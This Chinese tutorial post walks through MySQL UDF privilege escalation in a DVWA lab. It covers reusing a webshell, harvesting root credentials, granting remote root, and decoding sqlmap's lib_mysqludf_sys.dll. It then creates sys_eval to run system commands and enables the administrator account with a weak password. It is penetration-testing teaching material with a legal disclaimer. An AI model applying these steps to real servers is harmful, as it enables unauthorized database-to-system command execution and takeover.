数据库的权限提升

在数据库提权时要注意:

基于组件和软件的提权,提权能提到什么程度取决于组件(数据库)、网站部署时用的什么权限用户部署的。

而操作系统提权时利用系统内核漏洞打的是操作系统,所以没有像这样的运行用户的限制。

UDP提权

所用环境:Win7 + phpstudy + DVWA

简介:UDF是MySQL的一个拓展接口,提供用户自定义函数的功能,可以说是数据库功能的一种扩展。

原理:用户自定义的函数被当作本机函数执行,在使用CREATE FUNCITON调用dll中的函数后,mysql账号转化为system权限,从而实现提权。

复制代码
UDF提权条件:
1.Mysql版本大于5.1版本
2.网站本身存在Getshell漏洞,可以通过Webshell可以将udf.dll上传到Mysql中的lib\plugin目录下
3.掌握的Mysql数据库账号有对Mysql的insert和delete权限以创建和删除函数
4.secure-file-priv参数不为null

1.通过网站漏洞获取一个shell,如webshell

webshell地址:http://192.168.1.4/DVWA/hackable/uploads/test7.php

2.翻配置文件 查找数据库账号密码

找到了 账号:root 密码:root

3.navicat连接数据库

先允许数据库被连接

复制代码
# 允许数据库远程连接
grant all privileges on *.* to "root"@"%" identified by "root";

现在再连接

4.在数据库上做一些操作

复制代码
# Mysql配置文件增加 srcure-file-priv选项
secure_file_priv=
复制代码
新建查询,查询Mysql数据库所在系统位数:64位数
show variables like '%compile%'; 
复制代码
查看plugin目录
show variables like '%plugin%'; 

plugin目录:C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\

4、制作提权dll

自己写提权dll文件太麻烦了也不会写,我们想要的自定义函数不就是命令执行吗,sqlmap可以去执行命令啊 所以:

sqlmap中一定有编码后的dll文件,路径为:

复制代码
sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_
sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_

这是个编码后的文件

需要利用cloak.py进行解码获得mysqludf_sys.dll,cloak.py在sqlmap的sqlmap\extra\cloak\目录下

拿出这俩文件 执行以下命令进行解码

复制代码
python cloak.py -d -i lib_mysqludf_sys.dll_

5.将dll文件上传到C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\目录

Mysql默认安装时没有lib\plugin目录,需要新建

6.创建sys_eval函数,提权

复制代码
create function sys_eval returns string soname 'lib_mysqludf_sys.dll';

7.使用函数进行提权

复制代码
select sys_eval('whoami');

但是为什么提权之后还是普通用户miaos呢?

应为基于组件和软件的提权,提权能提到什么程度取决于组件(数据库)、网站部署时用的什么权限用户部署的。

8.靶机启用administrator 以administrator重启mysql

(1)先以管理员身份运行cmd 执行以下命令启用administrator并设置密码

复制代码
net user administrator /active:yes

net user administrator Aa123456

(2)切换administrator登录 重启mysql

9.再次尝试进行提权

复制代码
select sys_eval('whoami');

成功提升到administrator权限

【重要声明】

本文内容仅用于技术交流与学习,严禁用于任何非法用途。所有操作必须严格遵守《中华人民共和国网络安全法》及相关法律法规,仅在获得明确授权的前提下进行。读者应自行承担操作风险,作者不对任何违规使用或由此引发的法律后果负责。

相关推荐
技术不好的崎鸣同学7 分钟前
信息安全工程师之《网络安全体系与网络安全模型》
大数据·安全·web安全
Chockmans7 分钟前
春秋云境CVE-2022-32992(文件上传和sql注入)保姆级教学
数据库·sql·安全·网络安全·网络攻击模型·春秋云境·cve-2022-32992
muddjsv8 分钟前
SQL 语句:从产生、发展到内容全景
数据库·sql
ZC跨境爬虫10 分钟前
跟着 MDN 学CSS day_6:(伪类和伪元素详解)
前端·javascript·css·数据库·ui·html
xian_wwq11 分钟前
【学习笔记】探讨大模型应用安全建设系列7——安全评测与红队测试
笔记·学习·安全
天行健,君子而铎19 分钟前
AI赋能·精准适配——知影-API风险监测系统筑牢教育数据流转安全防线
大数据·人工智能·安全
m0_7381207222 分钟前
渗透测试基础知识——从零认识JWT(JSON Web Token)身份令牌
服务器·前端·安全·web安全·网络安全·json
洛水水25 分钟前
Redis对象类型与底层数据结构
数据结构·数据库·redis
倔强的石头_28 分钟前
深度解析:数据库内核如何通过逻辑推理与常值推导突破去重性能瓶颈
数据库
devilnumber29 分钟前
MySQL 部门表:树结构 (自关联) vs 非树结构 (扁平化 / 冗余字段)
数据库·mysql